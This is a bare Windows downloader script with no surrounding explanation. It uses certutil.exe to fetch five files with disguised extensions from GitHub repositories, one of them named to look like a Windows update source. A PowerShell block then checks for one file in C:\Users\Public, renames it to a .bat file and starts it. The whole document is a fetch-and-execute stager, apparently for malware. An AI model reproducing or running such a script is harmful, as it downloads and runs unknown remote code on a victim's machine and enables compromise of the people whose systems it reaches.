certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/MiCertIII.uiaq" MiCertIII.uiaq 
certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/WernerLS/Treb/master/6pylooper.uiaq" 6pylooper.uiaq
certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/WernerLS/Treb/master/6pylooper.altp" 6pylooper.altp
certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/WernerLS/Treb/master/8opfile.uiaq" 8opfile.uiaq
certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/WernerLS/Treb/master/up-query.altp" up-query.altp

if (!(Test-Path "C:\Users\Public\MiCertIII.uiaq"))
{
	echo "not found"
	exit
}
else
{
	ren MiCertIII.uiaq MiCertIII.bat
	start .\MiCertIII.bat
}
exit
